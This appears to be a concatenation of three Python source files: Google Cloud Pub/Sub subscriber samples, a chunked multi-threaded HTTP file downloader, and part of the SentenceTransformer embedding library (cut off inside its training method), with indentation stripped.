from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO subscription_name = "Your Pub/Sub subscription name"
subscriber = pubsub_v1.SubscriberClient()
# The `subscription_path` method creates a fully qualified identifier
# in the form `projects/{project_id}/subscriptions/{subscription_name}`
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
def callback(message):
print('Received message: {}'.format(message))
message.ack()
subscriber.subscribe(subscription_path, callback=callback)
# The subscriber is non-blocking. We must keep the main thread from
# exiting to allow it to process messages asynchronously in the background.
print('Listening for messages on {}'.format(subscription_path))
while True:
time.sleep(60)
# [END pubsub_subscriber_async_pull]
# [END pubsub_quickstart_subscriber]
def receive_messages_with_custom_attributes(project_id, subscription_name):
"""Receives messages from a pull subscription."""
# [START pubsub_subscriber_sync_pull_custom_attributes]
# [START pubsub_subscriber_async_pull_custom_attributes]
import time
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO subscription_name = "Your Pub/Sub subscription name"
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
def callback(message):
print('Received message: {}'.format(message.data))
if message.attributes:
print('Attributes:')
for key in message.attributes:
value = message.attributes.get(key)
print('{}: {}'.format(key, value))
message.ack()
subscriber.subscribe(subscription_path, callback=callback)
# The subscriber is non-blocking, so we must keep the main thread from
# exiting to allow it to process messages in the background.
print('Listening for messages on {}'.format(subscription_path))
while True:
time.sleep(60)
# [END pubsub_subscriber_async_pull_custom_attributes]
# [END pubsub_subscriber_sync_pull_custom_attributes]
def receive_messages_with_flow_control(project_id, subscription_name):
"""Receives messages from a pull subscription with flow control."""
# [START pubsub_subscriber_flow_settings]
import time
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO subscription_name = "Your Pub/Sub subscription name"
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
def callback(message):
print('Received message: {}'.format(message.data))
message.ack()
# Limit the subscriber to only have ten outstanding messages at a time.
flow_control = pubsub_v1.types.FlowControl(max_messages=10)
subscriber.subscribe(
subscription_path, callback=callback, flow_control=flow_control)
# The subscriber is non-blocking, so we must keep the main thread from
# exiting to allow it to process messages in the background.
print('Listening for messages on {}'.format(subscription_path))
while True:
time.sleep(60)
# [END pubsub_subscriber_flow_settings]
def synchronous_pull(project_id, subscription_name):
"""Pulling messages synchronously."""
# [START pubsub_subscriber_sync_pull]
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO subscription_name = "Your Pub/Sub subscription name"
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
NUM_MESSAGES = 3
# The subscriber pulls a specific number of messages.
response = subscriber.pull(subscription_path, max_messages=NUM_MESSAGES)
ack_ids = []
for received_message in response.received_messages:
print("Received: {}".format(received_message.message.data))
ack_ids.append(received_message.ack_id)
# Acknowledges the received messages so they will not be sent again.
subscriber.acknowledge(subscription_path, ack_ids)
print('Received and acknowledged {} messages. Done.'.format(
len(response.received_messages)))
# [END pubsub_subscriber_sync_pull]
def synchronous_pull_with_lease_management(project_id, subscription_name):
"""Pulling messages synchronously with lease management"""
# [START pubsub_subscriber_sync_pull_with_lease]
import logging
import multiprocessing
import random
import time
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO subscription_name = "Your Pub/Sub subscription name"
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
NUM_MESSAGES = 2
ACK_DEADLINE = 30
SLEEP_TIME = 10
# The subscriber pulls a specific number of messages.
response = subscriber.pull(subscription_path, max_messages=NUM_MESSAGES)
multiprocessing.log_to_stderr()
logger = multiprocessing.get_logger()
logger.setLevel(logging.INFO)
def worker(msg):
"""Simulates a long-running process."""
RUN_TIME = random.randint(1, 60)
logger.info('{}: Running {} for {}s'.format(
time.strftime("%X", time.gmtime()), msg.message.data, RUN_TIME))
time.sleep(RUN_TIME)
# `processes` maps each process to its ack id and message data.
processes = dict()
for message in response.received_messages:
process = multiprocessing.Process(target=worker, args=(message,))
processes[process] = (message.ack_id, message.message.data)
process.start()
while processes:
for process in list(processes):
ack_id, msg_data = processes[process]
# If the process is still running, reset the ack deadline to
# ACK_DEADLINE every SLEEP_TIME seconds.
if process.is_alive():
# `ack_deadline_seconds` must be between 10 and 600.
subscriber.modify_ack_deadline(
subscription_path,
[ack_id],
ack_deadline_seconds=ACK_DEADLINE)
logger.info('{}: Reset ack deadline for {} for {}s'.format(
time.strftime("%X", time.gmtime()),
msg_data, ACK_DEADLINE))
# If the process is finished, acknowledge it using `ack_id`.
else:
subscriber.acknowledge(subscription_path, [ack_id])
logger.info("{}: Acknowledged {}".format(
time.strftime("%X", time.gmtime()), msg_data))
processes.pop(process)
# If there are still processes running, sleep before checking again.
if processes:
time.sleep(SLEEP_TIME)
print('Received and acknowledged {} messages. Done.'.format(
len(response.received_messages)))
# [END pubsub_subscriber_sync_pull_with_lease]
def listen_for_errors(project_id, subscription_name):
"""Receives messages and catches errors from a pull subscription."""
# [START pubsub_subscriber_error_listener]
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO subscription_name = "Your Pubsub subscription name"
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
def callback(message):
print('Received message: {}'.format(message))
message.ack()
future = subscriber.subscribe(subscription_path, callback=callback)
# Blocks the thread while messages are coming in through the stream. Any
# exceptions that crop up on the thread will be set on the future.
try:
# result() blocks for up to the given timeout (30 seconds here); when the timeout is unspecified it waits indefinitely.
future.result(timeout=30)
except Exception as e:
print(
'Listening for messages on {} threw an Exception: {}.'.format(
subscription_name, e))
# [END pubsub_subscriber_error_listener]
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument('project_id', help='Your Google Cloud project ID')
subparsers = parser.add_subparsers(dest='command')
list_in_topic_parser = subparsers.add_parser(
'list_in_topic', help=list_subscriptions_in_topic.__doc__)
list_in_topic_parser.add_argument('topic_name')
list_in_project_parser = subparsers.add_parser(
'list_in_project', help=list_subscriptions_in_project.__doc__)
create_parser = subparsers.add_parser(
'create', help=create_subscription.__doc__)
create_parser.add_argument('topic_name')
create_parser.add_argument('subscription_name')
create_push_parser = subparsers.add_parser(
'create-push', help=create_push_subscription.__doc__)
create_push_parser.add_argument('topic_name')
create_push_parser.add_argument('subscription_name')
create_push_parser.add_argument('endpoint')
delete_parser = subparsers.add_parser(
'delete', help=delete_subscription.__doc__)
delete_parser.add_argument('subscription_name')
update_parser = subparsers.add_parser(
'update', help=update_subscription.__doc__)
update_parser.add_argument('subscription_name')
update_parser.add_argument('endpoint')
receive_parser = subparsers.add_parser(
'receive', help=receive_messages.__doc__)
receive_parser.add_argument('subscription_name')
receive_with_custom_attributes_parser = subparsers.add_parser(
'receive-custom-attributes',
help=receive_messages_with_custom_attributes.__doc__)
receive_with_custom_attributes_parser.add_argument('subscription_name')
receive_with_flow_control_parser = subparsers.add_parser(
'receive-flow-control',
help=receive_messages_with_flow_control.__doc__)
receive_with_flow_control_parser.add_argument('subscription_name')
synchronous_pull_parser = subparsers.add_parser(
'receive-synchronously',
help=synchronous_pull.__doc__)
synchronous_pull_parser.add_argument('subscription_name')
synchronous_pull_with_lease_management_parser = subparsers.add_parser(
'receive-synchronously-with-lease',
help=synchronous_pull_with_lease_management.__doc__)
synchronous_pull_with_lease_management_parser.add_argument(
'subscription_name')
listen_for_errors_parser = subparsers.add_parser(
'listen_for_errors', help=listen_for_errors.__doc__)
listen_for_errors_parser.add_argument('subscription_name')
args = parser.parse_args()
if args.command == 'list_in_topic':
list_subscriptions_in_topic(args.project_id, args.topic_name)
elif args.command == 'list_in_project':
list_subscriptions_in_project(args.project_id)
elif args.command == 'create':
create_subscription(
args.project_id, args.topic_name, args.subscription_name)
elif args.command == 'create-push':
create_push_subscription(
args.project_id,
args.topic_name,
args.subscription_name,
args.endpoint)
elif args.command == 'delete':
delete_subscription(
args.project_id, args.subscription_name)
elif args.command == 'update':
update_subscription(
args.project_id, args.subscription_name, args.endpoint)
elif args.command == 'receive':
receive_messages(args.project_id, args.subscription_name)
elif args.command == 'receive-custom-attributes':
receive_messages_with_custom_attributes(
args.project_id, args.subscription_name)
elif args.command == 'receive-flow-control':
receive_messages_with_flow_control(
args.project_id, args.subscription_name)
elif args.command == 'receive-synchronously':
synchronous_pull(
args.project_id, args.subscription_name)
elif args.command == 'receive-synchronously-with-lease':
synchronous_pull_with_lease_management(
args.project_id, args.subscription_name)
elif args.command == 'listen_for_errors':
listen_for_errors(args.project_id, args.subscription_name)
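# Hedged usage note (not part of the sample): the commands above can be
# exercised from a shell, e.g. (project, topic and subscription names below
# are placeholders):
#   python subscriber.py my-project create my-topic my-subscription
#   python subscriber.py my-project receive my-subscription
#   python subscriber.py my-project receive-synchronously my-subscription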
|
down.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import tempfile
import threading
import time
import warnings
import requests
from .chunk import Chunk
logger = logging.getLogger(__name__)
def readable_bytes(num, suffix='B'):
for unit in ['', 'Ki', 'Mi', 'Gi', 'Ti', 'Pi', 'Ei', 'Zi']:
if abs(num) < 1000.0:
return "{:5.1f} {}{}".format(num, unit, suffix)
num /= 1024.0
return "{:5.1f} {}{}".format(num, 'Yi', suffix)
class Downloader(object):
# States
INIT = 0
DOWNLOADING = 1
PAUSED = 2
MERGING = 3
FINISHED = 4
STOPPED = 5
def __init__(self, url, file_name, chunk_count, high_speed=False, headers=None):
self.url = url
self.file_name = file_name
self.chunk_count = chunk_count
self.high_speed = high_speed
if headers is None:
headers = []
self.headers = {}
for header in headers:
key = header.split(':')[0].strip()
value = header.split(':')[1].strip()
self.headers[key] = value
self.total_length = 0
self.total_downloaded = 0
self.total_merged = 0
self.__chunks = []
self.last_total = 0
self.speed = 0
self.readable_speed = readable_bytes(self.speed)
self.__state = Downloader.INIT
self.__subs = []
self.__progress_lock = threading.Lock()
self.__async = True
self.thread = threading.Thread(target=self.run)
# This function registers a callback.
# sub_callable: must take at least one argument (the Downloader).
# rate: minimum download speed, in kilobytes per second, required to
# trigger an update for the subscriber.
def subscribe(self, sub_callable, rate=1):
self.__subs.append([sub_callable, rate])
def notify_subs(self, force=False):
if force:
self.total_downloaded = 0
for chunk in self.__chunks:
self.total_downloaded += chunk.progress
self.speed = self.total_downloaded - self.last_total
self.readable_speed = readable_bytes(self.speed)
self.last_total = self.total_downloaded
for sub in self.__subs:
if self.speed > (sub[1] * 1024) or force:
sub[0](self)
def get_state(self):
return self.__state
def speed_func(self):
while self.__state != Downloader.STOPPED and self.__state != Downloader.MERGING:
self.total_downloaded = 0
for chunk in self.__chunks:
self.total_downloaded += chunk.progress
self.speed = self.total_downloaded - self.last_total
self.readable_speed = readable_bytes(self.speed)
self.last_total = self.total_downloaded
self.notify_subs()
time.sleep(1)
def stop(self):
for chunk in self.__chunks:
chunk.stop()
self.__state = Downloader.STOPPED
def start(self):
if self.__state != Downloader.INIT:
raise RuntimeError('Download has already been started.')
self.thread.start()
def start_sync(self):
if self.__state != Downloader.INIT:
raise RuntimeError('Download has already been started.')
self.run()
def pause(self):
if self.__state == Downloader.INIT:
warnings.warn("Download has not been started yet.")
return
for chunk in self.__chunks:
chunk.pause()
self.__state = Downloader.PAUSED
def resume(self):
if self.__state != Downloader.PAUSED:
warnings.warn("Resume is not applicable at this stage.")
logger.warn("Resume is not applicable at this stage.")
return
for chunk in self.__chunks:
chunk.resume()
self.__state = Downloader.DOWNLOADING
def wait_for_finish(self):
if self.__async:
while self.thread.is_alive():
continue
self.thread.join()
else:
warnings.warn('Downloader was set to run as synchronous. This function will not work')
def run(self):
self.__state = Downloader.DOWNLOADING
r = requests.get(self.url, stream=True, headers=self.headers)
if r.status_code != 200:
raise RuntimeError('Could not connect to given URL')
try:
self.total_length = int(r.headers.get('Content-Length'))
if r.headers.get('Accept-Ranges') != 'bytes':
raise RuntimeError('URL does not support ranged requests.')
except:
self.chunk_count = 0
warnings.warn(
'This url does not support parallel downloading. Normal download will continue.',
RuntimeWarning)
if self.chunk_count == 0:
chunk_file = tempfile.TemporaryFile()
new_chunk = Chunk(self, self.url, file=chunk_file, high_speed=self.high_speed, headers=self.headers)
self.__chunks.append(new_chunk)
new_chunk.start()
else:
chunk_size = self.total_length // self.chunk_count  # integer division keeps byte offsets integral
for chunk_number in range(self.chunk_count):
chunk_file = tempfile.TemporaryFile()
if chunk_number != self.chunk_count - 1:
new_chunk = Chunk(
self, self.url, chunk_file,
start_byte=chunk_number * chunk_size,
end_byte=((chunk_number + 1) * chunk_size) - 1,
number=chunk_number,
high_speed=self.high_speed,
headers=self.headers)
else:
new_chunk = Chunk(
self, self.url, chunk_file,
start_byte=chunk_number * chunk_size,
end_byte=self.total_length - 1,
number=chunk_number,
high_speed=self.high_speed,
headers=self.headers)
self.__chunks.append(new_chunk)
new_chunk.start()
speed_thread = threading.Thread(target=self.speed_func)
speed_thread.start()
for chunk in self.__chunks:
chunk.thread.join()
if self.__state == Downloader.STOPPED:
return
# Forcefully update subscribers for last time.
self.notify_subs(True)
self.__state = Downloader.MERGING
speed_thread.join()
# time to put together all parts
with open(self.file_name, 'wb') as fout:
for chunk in self.__chunks:
# Go to first byte of temporary file
chunk.file.seek(0)
while True:
readbytes = chunk.file.read(1024 * 1024 * 10)
self.total_merged += len(readbytes)
if readbytes:
fout.write(readbytes)
self.notify_subs(force=True)
else:
break
chunk.file.close()
self.__state = Downloader.FINISHED
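# Hedged usage sketch (not part of the module): one way to drive the
# Downloader with a progress callback. The URL, output file name and chunk
# count are illustrative assumptions; the helper is defined but not invoked
# because this module is normally imported as part of a package.
def _example_download(url="http://example.com/big.bin", file_name="big.bin"):
    def report(d):
        # d is the Downloader instance passed to every subscriber callback
        print("{} / {} bytes ({}/s)".format(d.total_downloaded, d.total_length, d.readable_speed))

    dl = Downloader(url, file_name, chunk_count=4)
    dl.subscribe(report, rate=1)  # fire the callback when speed exceeds about 1 KiB/s
    dl.start()
    dl.wait_for_finish()
    return dl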
|
SentenceTransformer.py
|
import json
import logging
import os
import shutil
from collections import OrderedDict
from typing import List, Dict, Tuple, Iterable, Type, Union, Callable
from zipfile import ZipFile
import requests
import numpy as np
from numpy import ndarray
import transformers
import torch
from torch import nn, Tensor, device
from torch.optim import Optimizer
from torch.utils.data import DataLoader
import torch.multiprocessing as mp
from tqdm.autonotebook import tqdm, trange
import math
import queue
from . import __DOWNLOAD_SERVER__
from .evaluation import SentenceEvaluator
from .util import import_from_string, batch_to_device, http_get
from .datasets.EncodeDataset import EncodeDataset
from .models import Transformer, Pooling
from . import __version__
class SentenceTransformer(nn.Sequential):
"""
Loads or creates a SentenceTransformer model that can be used to map sentences / text to embeddings.
:param model_name_or_path: If it is a filepath on disc, it loads the model from that path. If it is not a path, it first tries to download a pre-trained SentenceTransformer model. If that fails, tries to construct a model from Huggingface models repository with that name.
:param modules: This parameter can be used to create custom SentenceTransformer models from scratch.
:param device: Device (like 'cuda' / 'cpu') that should be used for computation. If None, checks if a GPU can be used.
"""
def __init__(self, model_name_or_path: str = None, modules: Iterable[nn.Module] = None, device: str = None):
if model_name_or_path is not None and model_name_or_path != "":
logging.info("Load pretrained SentenceTransformer: {}".format(model_name_or_path))
model_path = model_name_or_path
if not os.path.isdir(model_path) and not model_path.startswith('http://') and not model_path.startswith('https://'):
logging.info("Did not find folder {}".format(model_path))
if '\\' in model_path or model_path.count('/') > 1:
raise AttributeError("Path {} not found".format(model_path))
model_path = __DOWNLOAD_SERVER__ + model_path + '.zip'
logging.info("Try to download model from server: {}".format(model_path))
if model_path.startswith('http://') or model_path.startswith('https://'):
model_url = model_path
folder_name = model_url.replace("https://", "").replace("http://", "").replace("/", "_")[:250].rstrip('.zip')
try:
from torch.hub import _get_torch_home
torch_cache_home = _get_torch_home()
except ImportError:
torch_cache_home = os.path.expanduser(
os.getenv('TORCH_HOME', os.path.join(
os.getenv('XDG_CACHE_HOME', '~/.cache'), 'torch')))
default_cache_path = os.path.join(torch_cache_home, 'sentence_transformers')
model_path = os.path.join(default_cache_path, folder_name)
os.makedirs(model_path, exist_ok=True)
if not os.listdir(model_path):
if model_url[-1] == "/":
model_url = model_url[:-1]
logging.info("Downloading sentence transformer model from {} and saving it at {}".format(model_url, model_path))
try:
zip_save_path = os.path.join(model_path, 'model.zip')
http_get(model_url, zip_save_path)
with ZipFile(zip_save_path, 'r') as zip:
zip.extractall(model_path)
os.remove(zip_save_path)
except requests.exceptions.HTTPError as e:
shutil.rmtree(model_path)
if e.response.status_code == 404:
logging.warning('SentenceTransformer-Model {} not found. Try to create it from scratch'.format(model_url))
logging.warning('Try to create Transformer Model {} with mean pooling'.format(model_name_or_path))
model_path = None
transformer_model = Transformer(model_name_or_path)
pooling_model = Pooling(transformer_model.get_word_embedding_dimension())
modules = [transformer_model, pooling_model]
else:
raise e
except Exception as e:
shutil.rmtree(model_path)
raise e
#### Load from disk
if model_path is not None:
logging.info("Load SentenceTransformer from folder: {}".format(model_path))
if os.path.exists(os.path.join(model_path, 'config.json')):
with open(os.path.join(model_path, 'config.json')) as fIn:
config = json.load(fIn)
if config['__version__'] > __version__:
logging.warning("You try to use a model that was created with version {}, however, your version is {}. This might cause unexpected behavior or errors. In that case, try to update to the latest version.\n\n\n".format(config['__version__'], __version__))
with open(os.path.join(model_path, 'modules.json')) as fIn:
contained_modules = json.load(fIn)
modules = OrderedDict()
for module_config in contained_modules:
module_class = import_from_string(module_config['type'])
module = module_class.load(os.path.join(model_path, module_config['path']))
modules[module_config['name']] = module
if modules is not None and not isinstance(modules, OrderedDict):
modules = OrderedDict([(str(idx), module) for idx, module in enumerate(modules)])
super().__init__(modules)
if device is None:
device = "cuda" if torch.cuda.is_available() else "cpu"
logging.info("Use pytorch device: {}".format(device))
self._target_device = torch.device(device)
def encode(self, sentences: Union[str, List[str], List[int]],
batch_size: int = 32,
show_progress_bar: bool = None,
output_value: str = 'sentence_embedding',
convert_to_numpy: bool = True,
convert_to_tensor: bool = False,
is_pretokenized: bool = False,
device: str = None,
num_workers: int = 0) -> Union[List[Tensor], ndarray, Tensor]:
"""
Computes sentence embeddings
:param sentences: the sentences to embed
:param batch_size: the batch size used for the computation
:param show_progress_bar: Output a progress bar when encoding sentences
:param output_value: Default sentence_embedding, to get sentence embeddings. Can be set to token_embeddings to get wordpiece token embeddings.
:param convert_to_numpy: If true, the output is a list of numpy vectors. Else, it is a list of pytorch tensors.
:param convert_to_tensor: If true, the output is one stacked tensor. Overrides any setting of convert_to_numpy
:param is_pretokenized: If is_pretokenized=True, sentences must be a list of integers, containing the tokenized sentences with each token converted to its respective int.
:param device: Which torch.device to use for the computation
:param num_workers: Number of background-workers to tokenize data. Set to positive number to increase tokenization speed
:return:
By default, a list of tensors is returned. If convert_to_tensor, a stacked tensor is returned. If convert_to_numpy, a numpy matrix is returned.
"""
self.eval()
if show_progress_bar is None:
show_progress_bar = (logging.getLogger().getEffectiveLevel()==logging.INFO or logging.getLogger().getEffectiveLevel()==logging.DEBUG)
input_was_string = False
if isinstance(sentences, str): #Cast an individual sentence to a list with length 1
sentences = [sentences]
input_was_string = True
if device is None:
device = self._target_device
self.to(device)
all_embeddings = []
length_sorted_idx = np.argsort([self._text_length(sen) for sen in sentences])
sentences_sorted = [sentences[idx] for idx in length_sorted_idx]
inp_dataset = EncodeDataset(sentences_sorted, model=self, is_tokenized=is_pretokenized)
inp_dataloader = DataLoader(inp_dataset, batch_size=batch_size, collate_fn=self.smart_batching_collate_text_only, num_workers=num_workers, shuffle=False)
iterator = inp_dataloader
if show_progress_bar:
iterator = tqdm(inp_dataloader, desc="Batches")
for features in iterator:
for feature_name in features:
features[feature_name] = features[feature_name].to(device)
with torch.no_grad():
out_features = self.forward(features)
embeddings = out_features[output_value]
if output_value == 'token_embeddings':
#Set token embeddings to 0 for padding tokens
input_mask = out_features['attention_mask']
input_mask_expanded = input_mask.unsqueeze(-1).expand(embeddings.size()).float()
embeddings = embeddings * input_mask_expanded
all_embeddings.extend(embeddings)
all_embeddings = [all_embeddings[idx] for idx in np.argsort(length_sorted_idx)]
if convert_to_tensor:
all_embeddings = torch.stack(all_embeddings)
elif convert_to_numpy:
all_embeddings = np.asarray([emb.cpu().detach().numpy() for emb in all_embeddings])
if input_was_string:
all_embeddings = all_embeddings[0]
return all_embeddings
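# Hedged usage sketch (comment only, not part of the library): encode() is
# typically driven as below; the model name is an assumption and any
# pretrained SentenceTransformer identifier would do.
#   model = SentenceTransformer('bert-base-nli-mean-tokens')
#   embeddings = model.encode(['This is a sentence.', 'This is another one.'],
#                             batch_size=32, convert_to_numpy=True)
#   print(embeddings.shape)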
def start_multi_process_pool(self, target_devices: List[str] = None, encode_batch_size: int = 32):
"""
Starts a multi-process pool to run the encoding with several independent processes.
This method is recommended if you want to encode on multiple GPUs. It is advised
to start only one process per GPU. This method works together with encode_multi_process
:param target_devices: PyTorch target devices, e.g. cuda:0, cuda:1... If None, all available CUDA devices will be used
:param encode_batch_size: Batch size for each process when calling encode
:return: Returns a dict with the target processes, an input queue and an output queue.
"""
if target_devices is None:
if torch.cuda.is_available():
target_devices = ['cuda:{}'.format(i) for i in range(torch.cuda.device_count())]
else:
logging.info("CUDA is not available. Start 4 CPU worker")
target_devices = ['cpu']*4
logging.info("Start multi-process pool on devices: {}".format(', '.join(map(str, target_devices))))
ctx = mp.get_context('spawn')
input_queue = ctx.Queue()
output_queue = ctx.Queue()
processes = []
for cuda_id in target_devices:
p = ctx.Process(target=SentenceTransformer._encode_multi_process_worker, args=(cuda_id, self, input_queue, output_queue, encode_batch_size), daemon=True)
p.start()
processes.append(p)
return {'input': input_queue, 'output': output_queue, 'processes': processes}
@staticmethod
def stop_multi_process_pool(pool):
"""
Stops all processes started with start_multi_process_pool
"""
for p in pool['processes']:
p.terminate()
for p in pool['processes']:
p.join()
p.close()
pool['input'].close()
pool['output'].close()
def encode_multi_process(self, sentences: List[str], pool: Dict[str, object], is_pretokenized: bool = False, chunk_size=None):
"""
This method allows running encode() on multiple GPUs. The sentences are chunked into smaller packages
and sent to individual processes, which encode these on the different GPUs. This method is only suitable
for encoding large sets of sentences
:param sentences: List of sentences
:param pool: A pool of workers started with SentenceTransformer.start_multi_process_pool
:param is_pretokenized: If true, no tokenization will be applied. It is expected that the input sentences are lists of ints.
:param chunk_size: Sentences are chunked and sent to the individual processes. If None, a sensible chunk size is determined automatically.
:return: Numpy matrix with all embeddings
"""
if chunk_size is None:
chunk_size = min(math.ceil(len(sentences) / len(pool["processes"]) / 10), 5000)
logging.info("Chunk data into packages of size {}".format(chunk_size))
input_queue = pool['input']
last_chunk_id = 0
chunk = []
for sentence in sentences:
chunk.append(sentence)
if len(chunk) >= chunk_size:
input_queue.put([last_chunk_id, is_pretokenized, chunk])
last_chunk_id += 1
chunk = []
if len(chunk) > 0:
input_queue.put([last_chunk_id, is_pretokenized, chunk])
last_chunk_id += 1
output_queue = pool['output']
results_list = sorted([output_queue.get() for _ in range(last_chunk_id)], key=lambda x: x[0])
embeddings = np.concatenate([result[1] for result in results_list])
return embeddings
@staticmethod
def _encode_multi_process_worker(target_device: str, model, input_queue, results_queue, encode_batch_size):
"""
Internal working process to encode sentences in multi-process setup
"""
while True:
try:
id, is_pretokenized, sentences = input_queue.get()
embeddings = model.encode(sentences, device=target_device, is_pretokenized=is_pretokenized, show_progress_bar=False, convert_to_numpy=True, batch_size=encode_batch_size)
results_queue.put([id, embeddings])
except queue.Empty:
break
def get_max_seq_length(self):
"""
Returns the maximal sequence length of inputs the model accepts. Longer inputs will be truncated.
"""
if hasattr(self._first_module(), 'max_seq_length'):
return self._first_module().max_seq_length
return None
def tokenize(self, text: str):
"""
Tokenizes the text
"""
return self._first_module().tokenize(text)
def get_sentence_features(self, *features):
return self._first_module().get_sentence_features(*features)
def get_sentence_embedding_dimension(self):
return self._last_module().get_sentence_embedding_dimension()
def _first_module(self):
"""Returns the first module of this sequential embedder"""
return self._modules[next(iter(self._modules))]
def _last_module(self):
"""Returns the last module of this sequential embedder"""
return self._modules[next(reversed(self._modules))]
def save(self, path):
"""
Saves all elements for this seq. sentence embedder into different sub-folders
"""
if path is None:
return
logging.info("Save model to {}".format(path))
contained_modules = []
for idx, name in enumerate(self._modules):
module = self._modules[name]
model_path = os.path.join(path, str(idx)+"_"+type(module).__name__)
os.makedirs(model_path, exist_ok=True)
module.save(model_path)
contained_modules.append({'idx': idx, 'name': name, 'path': os.path.basename(model_path), 'type': type(module).__module__})
with open(os.path.join(path, 'modules.json'), 'w') as fOut:
json.dump(contained_modules, fOut, indent=2)
with open(os.path.join(path, 'config.json'), 'w') as fOut:
json.dump({'__version__': __version__}, fOut, indent=2)
def smart_batching_collate(self, batch):
"""
Transforms a batch from a SmartBatchingDataset to a batch of tensors for the model
Here, batch is a list of tuples: [(tokens, label), ...]
:param batch:
a batch from a SmartBatchingDataset
:return:
a batch of tensors for the model
"""
num_texts = len(batch[0][0])
labels = []
paired_texts = [[] for _ in range(num_texts)]
max_seq_len = [0] * num_texts
for tokens, label in batch:
labels.append(label)
for i in range(num_texts):
paired_texts[i].append(tokens[i])
max_seq_len[i] = max(max_seq_len[i], self._text_length(tokens[i]))
features = []
for idx in range(num_texts):
max_len = max_seq_len[idx]
feature_lists = {}
for text in paired_texts[idx]:
sentence_features = self.get_sentence_features(text, max_len)
for feature_name in sentence_features:
if feature_name not in feature_lists:
feature_lists[feature_name] = []
feature_lists[feature_name].append(sentence_features[feature_name])
for feature_name in feature_lists:
feature_lists[feature_name] = torch.cat(feature_lists[feature_name])
features.append(feature_lists)
return {'features': features, 'labels': torch.stack(labels)}
def smart_batching_collate_text_only(self, batch):
"""
Transforms a batch from a SmartBatchingDataset to a batch of tensors for the model.
Here, batch is a list of texts
:param batch:
a batch from a SmartBatchingDataset
:return:
a batch of tensors for the model
"""
max_seq_len = max([self._text_length(text) for text in batch])
feature_lists = {}
for text in batch:
sentence_features = self.get_sentence_features(text, max_seq_len)
for feature_name in sentence_features:
if feature_name not in feature_lists:
feature_lists[feature_name] = []
feature_lists[feature_name].append(sentence_features[feature_name])
for feature_name in feature_lists:
feature_lists[feature_name] = torch.cat(feature_lists[feature_name])
return feature_lists
def _text_length(self, text: Union[List[int], List[List[int]]]):
"""
Helper function to get the length of the input text. Text can be either
a list of ints (which means a single text as input), or a tuple of lists of ints
(representing several text inputs to the model).
"""
if len(text) == 0 or isinstance(text[0], int):
return len(text)
else:
return sum([len(t) for t in text])
def fit(self,
train_objectives: Iterable[Tuple[DataLoader, nn.Module]],
evaluator: SentenceEvaluator,
epochs: int = 1,
steps_per_epoch = None,
scheduler: str = 'WarmupLinear',
warmup_steps: int = 10000,
optimizer_class: Type[Optimizer] = transformers.AdamW,
optimizer_params : Dict[str, object]= {'lr': 2e-5, 'eps': 1e-6, 'correct_bias': False},
weight_decay: float = 0.01,
evaluation_steps: int = 0,
output_path: str = None,
output_path_ignore_not_empty: bool = False,
save_best_model: bool = True,
max_grad_norm: float = 1,
use_amp: bool = False,
callback: Callable[[float, int, int], None] = None,
):
"""
Train the model with the given training objective
Each training objective is sampled in turn for one batch.
We sample only as many batches from each objective as there are in the smallest one
to make sure of equal training with each dataset.
:param train_objectives: Tuples of (DataLoader, LossFunction). Pass more than one for multi-task learning
:param evaluator: An evaluator (sentence_transformers.evaluation) evaluates the model performance during training on held-out dev data. It is used to determine the best model that is saved to disc.
:param epochs: Number of epochs for training
:param steps_per_epoch: Number of training steps per epoch. If set to None (default), one epoch is equal the DataLoader size from train_objectives.
:param scheduler: Learning rate scheduler. Available schedulers: constantlr, warmupconstant, warmuplinear, warmupcosine, warmupcosinewithhardrestarts
:param warmup_steps: Behavior depends on the scheduler. For WarmupLinear (default), the learning rate is increased from 0 up to the maximal learning rate. After these many training steps, the learning rate is decreased linearly back to zero.
:param optimizer_class: Optimizer
:param optimizer_params: Optimizer parameters
:param weight_decay: Weight decay for model parameters
:param evaluation_steps: If > 0, evaluate the model using evaluator after each number of training steps
:param output_path: Storage path for the model and evaluation files
:param output_path_ignore_not_empty: By default, training will stop if output_path is not empty. If set to true, this error will be ignored and training proceeds.
:param save_best_model: If true, the best model (according to evaluator) is stored at output_path
:param max_grad_norm: Used for gradient clipping.
:param use_amp: Use Automatic Mixed Precision (AMP). Only for Pytorch >= 1.6.0
:param callback: Callback function that is invoked after each evaluation.
It must accept the following three parameters in this order:
`score`, `epoch`, `steps`
"""
if use_amp:
from torch.cuda.amp import autocast
scaler = torch.cuda.amp.GradScaler()
self.to(self._target_device)
if output_path is not None:
os.makedirs(output_path, exist_ok=True)
if not output_path_ignore_not_empty and len(os.listdir(output_path)) > 0:
raise ValueError("Output directory ({}) already exists and is not empty.".format(
output_path))
dataloaders = [dataloader for dataloader, _ in train_objectives]
# Use smart batching
for dataloader in dataloaders:
dataloader.collate_fn = self.smart_batching_collate
loss_models = [loss for _, loss in train_objectives]
for loss_model in loss_models:
loss_model.to(self._target_device)
self.best_score = -9999999
if steps_per_epoch is None or steps_per_epoch == 0:
steps_per_epoch = min([len(dataloader) for dataloader in dataloaders])
num_train_steps = int(steps_per_epoch * epochs)
# Prepare optimizers
optimizers = []
schedulers = []
for loss_model in loss_models:
param_optimizer = list(loss_model.named_parameters())
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': weight_decay},
